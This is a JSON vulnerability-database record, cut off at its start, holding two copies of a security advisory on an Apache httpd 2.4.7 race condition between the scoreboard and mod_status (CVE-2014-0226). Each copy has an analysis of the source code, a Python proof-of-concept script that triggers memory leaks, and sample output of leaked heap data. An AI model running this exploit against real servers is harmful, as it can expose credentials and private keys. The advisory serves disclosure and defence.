e:\r\n print e\r\n pass\r\n \r\n def mod_status_thread():\r\n while True:\r\n send_request(\"GET\", \"/foo?notables\")\r\n \r\n def requests():\r\n evil = ''.join('A' for i in range(random.randint(0, 1024)))\r\n while True:\r\n send_request(evil, evil)\r\n \r\n threading.Thread(target=mod_status_thread).start()\r\n threading.Thread(target=requests).start()\r\n \r\n -- cut\r\n \r\nBelow are the information leak samples gathered by running the poc\r\nagainst the\r\ntesting Apache instance. Leaks include i.e. HTTP headers, htaccess\r\ncontent,\r\nhttpd.conf content etc. On a live systems with a higher traffic\r\nsamples should\r\nbe way more interesting.\r\n \r\n $ ./poc.py | grep \"\" |grep -v AAAA | grep -v \"{}\"| grep -v notables\r\n 127.0.0.1 {A} []\r\n 127.0.0.1 {A.01 cu0 cs0\r\n 127.0.0.1 {A27.0.0.1} []\r\n 127.0.0.1 {A|0|10 [Dead] u.01 s.01 cu0 cs0\r\n 127.0.0.1 {A\r\n \u00db []\r\n 127.0.0.1 {A HTTP/1.1} []\r\n 127.0.0.1 {Ab><br />\r\n 127.0.0.1 {AAA}</i> <b>[127.0.1.1:19666]</b><br\r\n/>\r\n 127.0.0.1 {A0.1.1:19666]</b><br />\r\n 127.0.0.1 {A\u00a7} []\r\n 127.0.0.1 {A cs0\r\n 127.0.0.1 {Adentity\r\n 127.0.0.1 {A HTTP/1.1} []\r\n 127.0.0.1 {Ape: text/html; charset=ISO-8859-1\r\n 127.0.0.1 {Ahome/IjonTichy/httpd-2.4.7-vanilla/htdocs/} []\r\n 127.0.0.1 {A\u00ff\u00ff\u00ff\u00ff\u00ff\u00ff\u00ff} []\r\n 127.0.0.1 {Aanilla/htdocs/foo} []\r\n 127.0.0.1 {A0n/httpd-2.4.7-vanilla/htdocs/foo/} []\r\n 127.0.0.1 {A......................................... } []\r\n 127.0.0.1 {A-2014 16:23:30 CEST} []\r\n 127.0.0.1 {Acontent of htaccess\r\n 127.0.0.1 {Aver: Apache/2.4.7 (Unix)\r\n 127.0.0.1 {Aroxy:balancer://mycluster} []\r\nWe hope you enjoyed it.\r\n \r\nRegards,\r\nMarek Kroemeke, AKAT-1 and 22733db72ab3ed94b5f8a1ffcde850251fe6f466\n\n# 0day.today [2018-02-06] #", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/22451"}], "packetstorm": [{"lastseen": "2016-12-05T22:24:15", "bulletinFamily": "exploit", "description": "", "modified": "2014-07-21T00:00:00", "published": "2014-07-21T00:00:00", "href": "https://packetstormsecurity.com/files/127546/Apache-Scoreboard-Status-Race-Condition.html", "id": "PACKETSTORM:127546", "type": "packetstorm", "title": "Apache Scoreboard / Status Race Condition", "sourceData": "` ::: ::::::::: ::: :::::::: ::: ::::::::::::: ::: :::::::::::::::::::::::::::::::::: ::::::::: \n:+: :+: :+: :+: :+: :+: :+: :+::+: :+::+: :+: :+: :+: :+: :+: :+::+: :+: \n+:+ +:+ +:+ +:++:+ +:+ +:+ +:+ +:++:+ +:+ +:+ +:+ +:+ +:+ +:++:+ +:+ \n+#++:++#++:+#++:++#++#++:++#++:+#+ +#++:++#+++#++:++# +#++:++#++ +#+ +#+ +#++:++#+ +#+ +:+ \n+#+ +#++#+ +#+ +#++#+ +#+ +#++#+ +#+ +#+ +#+ +#+ +#+ +#+ +#+ \n#+# #+##+# #+# #+##+# #+##+# #+##+# #+# #+# #+# #+# #+# #+# #+# \n### ###### ### ### ######## ### ############# ### ### ### ### ### ######### \n \n:::::::: ::: ::::::::::::: :::::::: ::::::: ::: ::: ::::::: :::::::: :::::::: :::::::: \n:+: :+::+: :+::+: :+: :+::+: :+::+:+: :+: :+: :+::+: :+::+: :+::+: :+: \n+:+ +:+ +:++:+ +:+ +:+ :+:+ +:+ +:+ +:+ +:+ :+:+ +:+ +:+ +:+ \n+#+ +#+ +:++#++:++# #++:++ +#+ +#+ + +:+ +#+ +#+ +:+ #++:++ #+ + +:+ +#+ +#+ +#++:++#+ \n+#+ +#+ +#+ +#+ +#+ +#+# +#+ +#++#+#+#+#+#+ +#+# +#+ +#+ +#+ +#+ +#+ \n#+# #+# #+#+#+# #+# #+# #+# #+# #+# #+# #+# #+# #+# #+# #+# #+# \n######## ### ########## ########## ####### ####### ### ####### #################### ######## \n \n+:+:+:+:+:+:++:+:+:+:+:+:++:+:+:+:+:+:++:+:+:+:+:+:++:+:+:+:+:+:++:+:+:+:+:+:++:+:+:+:+:+:++:+:+:+:+:+:++:+:+:+:+:+:+ \n+#+#+#+#+#+#++#+#+#+#+#+#++#+#+#+#+#+#++#+#+#+#+#+#++#+#+#+#+#+#++#+#+#+#+#+#++#+#+#+#+#+#++#+#+#+#+#+#++#+#+#+#+#+#+ \n \n \nHi there, \n \n--[ 0. Sparse summary \nRace condition between updating httpd's \"scoreboard\" and mod_status, \nleading to several critical scenarios like heap buffer overflow with user \nsupplied payload and leaking heap which can leak critical memory containing \nhtaccess credentials, ssl certificates private keys and so on. \n \n \n--[ 1. Prerequisites \n \nApache httpd compiled with MPM event or MPM worker. \nThe tested version was 2.4.7 compiled with: \n \n./configure --enable-mods-shared=reallyall --with-included-apr \n \nThe tested mod_status configuration in httpd.conf was: \n \n<Location /foo> \nSetHandler server-status \n</Location> \nExtendedStatus On \n \n \n--[ 2. Race Condition \n \nFunction ap_escape_logitem in server/util.c looks as follows: \n \n1908AP_DECLARE(char *) ap_escape_logitem(apr_pool_t *p, const char *str) \n1909{ \n1910 char *ret; \n1911 unsigned char *d; \n1912 const unsigned char *s; \n1913 apr_size_t length, escapes = 0; \n1914 \n1915 if (!str) { \n1916 return NULL; \n1917 } \n1918 \n1919 /* Compute how many characters need to be escaped */ \n1920 s = (const unsigned char *)str; \n1921 for (; *s; ++s) { \n1922 if (TEST_CHAR(*s, T_ESCAPE_LOGITEM)) { \n1923 escapes++; \n1924 } \n1925 } \n1926 \n1927 /* Compute the length of the input string, including NULL */ \n1928 length = s - (const unsigned char *)str + 1; \n1929 \n1930 /* Fast path: nothing to escape */ \n1931 if (escapes == 0) { \n1932 return apr_pmemdup(p, str, length); \n1933 } \n \nIn the for-loop between 1921 and 1925 lines function is computing the length of \nsupplied str (almost like strlen, but additionally it counts special characters \nwhich need to be escaped). As comment in 1927 value says, function computes count \nof bytes to copy. If there's nothing to escape function uses apr_pmemdup to duplicate \nthe str. In our single-threaded mind everything looks good, but tricky part starts \nwhen we introduce multi-threading. Apache in MPM mode runs workers as threads, let's \nconsider the following scenario: \n \n1) ap_escape_logitem(pool, \"\") is called \n2) for-loop in 1921 line immediately escapes, because *s is \\0 in first loop run \n3) malicious thread change memory under *s to another value (something which is not \\0) \n4) apr_pmemdup copies that change value to new string and returns it \n \nOutput from the ap_escape_logitem is considered to be a string, if scenario above would occur, \nthen returned string would not be zeroed at the end, which may be harmful. The mod_status \ncode looks as follows: \n \n833 ap_rprintf(r, \"</td><td>%s</td><td nowrap>%s</td>\" \n834 \"<td nowrap>%s</td></tr>\\n\\n\", \n835 ap_escape_html(r->pool, \n836 ws_record->client), \n837 ap_escape_html(r->pool, \n838 ws_record->vhost), \n839 ap_escape_html(r->pool, \n840 ap_escape_logitem(r->pool, \n841 ws_record->request))); \n \nThe relevant call to ap_escape_html() is at line 839 after the evaluation of ap_escape_logitem(). \nThe first argument passed to the ap_escape_logitem() is in fact an apr pool associated with \nthe HTTP request and defined in the request_rec structure. \n \nThis code is a part of a larger for-loop where code is iterating over worker_score structs which is \ndefined as follows: \n \n90struct worker_score { \n91#if APR_HAS_THREADS \n92 apr_os_thread_t tid; \n93#endif \n94 int thread_num; \n95 /* With some MPMs (e.g., worker), a worker_score can represent \n96 * a thread in a terminating process which is no longer \n97 * represented by the corresponding process_score. These MPMs \n98 * should set pid and generation fields in the worker_score. \n99 */ \n100 pid_t pid; \n101 ap_generation_t generation; \n102 unsigned char status; \n103 unsigned short conn_count; \n104 apr_off_t conn_bytes; \n105 unsigned long access_count; \n106 apr_off_t bytes_served; \n107 unsigned long my_access_count; \n108 apr_off_t my_bytes_served; \n109 apr_time_t start_time; \n110 apr_time_t stop_time; \n111 apr_time_t last_used; \n112#ifdef HAVE_TIMES \n113 struct tms times; \n114#endif \n115 char client[40]; /* Keep 'em small... but large enough to hold an IPv6 address */ \n116 char request[64]; /* We just want an idea... */ \n117 char vhost[32]; /* What virtual host is being accessed? */ \n118}; \n \nThe 'request' field in a worker_score structure is particularly interesting - this field can be changed inside \nthe copy_request function, which is called by the update_child_status_internal. This change may occur when the \nmod_status is iterating over the workers at the same time the ap_escape_logitem is called within a different \nthread, leading to a race condition. We can trigger this exact scenario in order to return a string without a \ntrailing \\0. This can be achived by running two clients, one triggering the mod_status handler and second \nsending random requests to the web server. Let's consider the following example: \n \n1) the mod_status iterates over workers invoking update_child_status_internal() \n2) at some point for one worker mod_status calls ap_escape_logitem(pool, ws_record->request) \n3) let's asume that ws_record->request at the beginning is \"\" literally \\0 at the first byte. \n4) inside the ap_escape_logitem function the length of the ws_record->request is computed, which is 1 \n(an empty string consisting of \\0) \n5) another thread modifies ws_record->request (in fact it's called ws->request in update_child_status_internal \nfunction but it's exactly the same location in memory) and puts there i.e. \"GET / HTTP/1.0\" \n6) the ap_pmemdup(pool, str, 1) in ap_escape_logitem copies the first one byte from \"GET / HTTP/1.0\" - \"G\" in \nthat case and returns it. The ap_pmemdup looks as follows: \n \n112APR_DECLARE(void *) apr_pmemdup(apr_pool_t *a, const void *m, apr_size_t n) \n113{ \n114 void *res; \n115 \n116 if (m == NULL) \n117 return NULL; \n118 res = apr_palloc(a, n); \n119 memcpy(res, m, n); \n120 return res; \n \nIt allocates memory using apr_palloc function which returns \"ditry\" memory (note that apr_pcalloc overwrite \nallocated memory with NULs). \n \nSo it's non-deterministic what's after the copied \"G\" byte. There might be \\0 or might be not. For now let's \nassume that the memory allocated by apr_palloc was dirty (containing random bytes). \n7) ap_escape_logitem returns \"G.....\" .junk. \"\\0\" \n \nThe value from the example above is then pushed to the ap_escape_html2 function which is also declared in util.c: \n \n1860AP_DECLARE(char *) ap_escape_html2(apr_pool_t *p, const char *s, int toasc) \n1861{ \n1862 int i, j; \n1863 char *x; \n1864 \n1865 /* first, count the number of extra characters */ \n1866 for (i = 0, j = 0; s[i] != '\\0'; i++) \n1867 if (s[i] == '<' || s[i] == '>') \n1868 j += 3; \n1869 else if (s[i] == '&') \n1870 j += 4; \n1871 else if (s[i] == '\"') \n1872 j += 5; \n1873 else if (toasc && !apr_isascii(s[i])) \n1874 j += 5; \n1875 \n1876 if (j == 0) \n1877 return apr_pstrmemdup(p, s, i); \n1878 \n1879 x = apr_palloc(p, i + j + 1); \n1880 for (i = 0, j = 0; s[i] != '\\0'; i++, j++) \n1881 if (s[i] == '<') { \n1882 memcpy(&x[j], \"<\", 4); \n1883 j += 3; \n1884 } \n1885 else if (s[i] == '>') { \n1886 memcpy(&x[j], \">\", 4); \n1887 j += 3; \n1888 } \n1889 else if (s[i] == '&') { \n1890 memcpy(&x[j], \"&\", 5); \n1891 j += 4; \n1892 } \n1893 else if (s[i] == '\"') { \n1894 memcpy(&x[j], \"\"\", 6); \n1895 j += 5; \n1896 } \n1897 else if (toasc && !apr_isascii(s[i])) { \n1898 char *esc = apr_psprintf(p, \"&#%3.3d;\", (unsigned char)s[i]); \n1899 memcpy(&x[j], esc, 6); \n1900 j += 5; \n1901 } \n1902 else \n1903 x[j] = s[i]; \n1904 \n1905 x[j] = '\\0'; \n1906 return x; \n1907} \n \nIf the string from the example above would be passed to this function we should get the following code-flow: \n \n1) in the for-loop started in line 1866 we count the length of escaped string \n2) because 's' string contains junk (due to only one byte being allocated by the apr_palloc function), \nit may contain '>' character. Let's assume that this is our case \n3) after for-loop in 1866 line 'j' is greater than 0 (at least one s[i] equals '>' as assumed above \n4) in the 1879 line memory for escaped 'd' string is allocated \n5) for-loop started in line 1880 copies string 's' to the escaped 'd' string BUT apr_palloc has allocated \nonly one byte for 's'. Thus, for each i > 0 the loop reads random memory and copies that value \nto 'd' string. At this point it's possible to trigger an information leak vulnerability (see section 5). \n \nHowever the 's' string may overlap with 'd' i.e.: \n \n's' is allocated under 0 with contents s = \"AAAAAAAA>\\0\" \n'd' is allocated under 8 then s[8] = d[0]. \n \nIf that would be the case, then for-loop would run forever (s[i] never would be \\0 since it was overwritten in the loop \nby non-zero). Forever... until it hits an unmapped memory or read only area. \n \nPart of the scoreboard.c code which may overwrite the ws_record->request was discovered using a tsan: \n \n#1 ap_escape_logitem ??:0 (exe+0x0000000411f2) \n#2 status_handler /home/akat-1/src/httpd-2.4.7/modules/generators/mod_status.c:839 (mod_status.so+0x0000000044b0) \n#3 ap_run_handler ??:0 (exe+0x000000084d98) \n#4 ap_invoke_handler ??:0 (exe+0x00000008606e) \n#5 ap_process_async_request ??:0 (exe+0x0000000b7ed9) \n#6 ap_process_http_async_connection http_core.c:0 (exe+0x0000000b143e) \n#7 ap_process_http_connection http_core.c:0 (exe+0x0000000b177f) \n#8 ap_run_process_connection ??:0 (exe+0x00000009d156) \n#9 process_socket event.c:0 (exe+0x0000000cc65e) \n#10 worker_thread event.c:0 (exe+0x0000000d0945) \n#11 dummy_worker thread.c:0 (libapr-1.so.0+0x00000004bb57) \n#12 <null> <null>:0 (libtsan.so.0+0x00000001b279) \n \nPrevious write of size 1 at 0x7feff2b862b8 by thread T2: \n#0 update_child_status_internal scoreboard.c:0 (exe+0x00000004d4c6) \n#1 ap_update_child_status_from_conn ??:0 (exe+0x00000004d693) \n#2 ap_process_http_async_connection http_core.c:0 (exe+0x0000000b139a) \n#3 ap_process_http_connection http_core.c:0 (exe+0x0000000b177f) \n#4 ap_run_process_connection ??:0 (exe+0x00000009d156) \n#5 process_socket event.c:0 (exe+0x0000000cc65e) \n#6 worker_thread event.c:0 (exe+0x0000000d0945) \n#7 dummy_worker thread.c:0 (libapr-1.so.0+0x00000004bb57) \n#8 <null> <null>:0 (libtsan.so.0+0x00000001b279) \n \n \n--[ 3. Consequences \n \nRace condition described in section 2, may lead to: \n \n- information leak in case when the string returned by ap_escape_logitem is not \\0 at the end, \njunk after copied bytes may be valuable \n- overwriting heap with a user supplied value which may imply code execution \n \n \n--[ 4. Exploitation \n \nIn order to exploit the heap overflow bug it's necessary to get control over: \n \n1) triggering the race-condition bug \n2) allocating 's' and 'd' strings in the ap_escape_html2 to overlap \n3) part of 's' which doesn't overlap with 'd' (this string is copied over and over again) \n4) overwriting the heap in order to get total control over the cpu or at least modify the \napache's handler code flow for our benefits \n \n \n--[ 5. Information Disclosure Proof of Concept \n \n-- cut \n#! /usr/bin/env python \n \nimport httplib \nimport sys \nimport threading \nimport subprocess \nimport random \n \ndef send_request(method, url): \ntry: \nc = httplib.HTTPConnection('127.0.0.1', 80) \nc.request(method,url); \nif \"foo\" in url: \nprint c.getresponse().read() \nc.close() \nexcept Exception, e: \nprint e \npass \n \ndef mod_status_thread(): \nwhile True: \nsend_request(\"GET\", \"/foo?notables\") \n \ndef requests(): \nevil = ''.join('A' for i in range(random.randint(0, 1024))) \nwhile True: \nsend_request(evil, evil) \n \nthreading.Thread(target=mod_status_thread).start() \nthreading.Thread(target=requests).start() \n \n-- cut \n \nBelow are the information leak samples gathered by running the poc against the \ntesting Apache instance. Leaks include i.e. HTTP headers, htaccess content, \nhttpd.conf content etc. On a live systems with a higher traffic samples should \nbe way more interesting. \n \n$ ./poc.py | grep \"<i>\" |grep -v AAAA | grep -v \"{}\"| grep -v notables \n<i>127.0.0.1 {A}</i> <b>[]</b><br /> \n<i>127.0.0.1 {A.01 cu0 cs0 \n<i>127.0.0.1 {A27.0.0.1}</i> <b>[]</b><br /> \n<i>127.0.0.1 {A|0|10 [Dead] u.01 s.01 cu0 cs0 \n<i>127.0.0.1 {A \n\u00db</i> <b>[]</b><br /> \n<i>127.0.0.1 {A HTTP/1.1}</i> <b>[]</b><br /> \n<i>127.0.0.1 {Ab><br /> \n<i>127.0.0.1 {AAA}</i> <b>[127.0.1.1:19666]</b><br /> \n<i>127.0.0.1 {A0.1.1:19666]</b><br /> \n<i>127.0.0.1 {A\u00a7}</i> <b>[]</b><br /> \n<i>127.0.0.1 {A cs0 \n<i>127.0.0.1 {Adentity \n<i>127.0.0.1 {A HTTP/1.1}</i> <b>[]</b><br /> \n<i>127.0.0.1 {Ape: text/html; charset=ISO-8859-1 \n<i>127.0.0.1 {Ahome/IjonTichy/httpd-2.4.7-vanilla/htdocs/}</i> <b>[]</b><br /> \n<i>127.0.0.1 {A\u00ff\u00ff\u00ff\u00ff\u00ff\u00ff\u00ff}</i> <b>[]</b><br /> \n<i>127.0.0.1 {Aanilla/htdocs/foo}</i> <b>[]</b><br /> \n<i>127.0.0.1 {A0n/httpd-2.4.7-vanilla/htdocs/foo/}</i> <b>[]</b><br /> \n<i>127.0.0.1 {A......................................... }</i> <b>[]</b><br /> \n<i>127.0.0.1 {A-2014 16:23:30 CEST}</i> <b>[]</b><br /> \n<i>127.0.0.1 {Acontent of htaccess \n<i>127.0.0.1 {Aver: Apache/2.4.7 (Unix) \n<i>127.0.0.1 {Aroxy:balancer://mycluster}</i> <b>[]</b><br /> \n \n \nWe hope you enjoyed it. \n \nRegards, \nMarek Kroemeke, AKAT-1 and 22733db72ab3ed94b5f8a1ffcde850251fe6f466 \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/127546/cve-2014-0226.txt", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}
